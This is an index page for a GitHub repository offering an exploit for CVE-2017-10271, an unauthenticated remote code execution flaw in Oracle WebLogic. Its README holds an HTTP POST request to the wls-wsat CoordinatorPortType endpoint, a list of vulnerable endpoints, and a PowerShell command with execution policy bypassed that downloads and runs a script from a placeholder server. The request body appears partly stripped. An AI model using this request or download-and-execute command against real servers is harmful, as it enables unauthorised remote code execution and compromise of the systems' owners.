Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/c0mmand3rOpSec/CVE-2017-10271
WebLogic Exploit
https://github.com/c0mmand3rOpSec/CVE-2017-10271
Last synced: 22 days ago
JSON representation
WebLogic Exploit
- Host: GitHub
- URL: https://github.com/c0mmand3rOpSec/CVE-2017-10271
- Owner: c0mmand3rOpSec
- Created: 2017-12-28T01:30:50.000Z (almost 7 years ago)
- Default Branch: master
- Last Pushed: 2018-07-13T18:56:53.000Z (over 6 years ago)
- Last Synced: 2024-08-05T17:40:41.450Z (4 months ago)
- Language: Python
- Size: 14.6 KB
- Stars: 142
- Watchers: 9
- Forks: 46
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - c0mmand3rOpSec/CVE-2017-10271 - WebLogic Exploit (Python)
README
CVE-2017-10271 identification and exploitation. Unauthenticated Weblogic RCE.
https://nvd.nist.gov/vuln/detail/CVE-2017-10271
https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html
```
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: SOMEHOSTHERE
Content-Length: 1226
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*
User-Agent: python-requests/2.2.1 CPython/2.7.6 Linux/3.19.0-25-generic
cmd
/c
powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://SOMESERVERHERE/GOTPAYLOAD.ps1')
```
wls-wsat endpoint list
```
CoordinatorPortType
RegistrationPortTypeRPC
ParticipantPortType
RegistrationRequesterPortType
CoordinatorPortType11
RegistrationPortTypeRPC11
ParticipantPortType11
RegistrationRequesterPortType11
```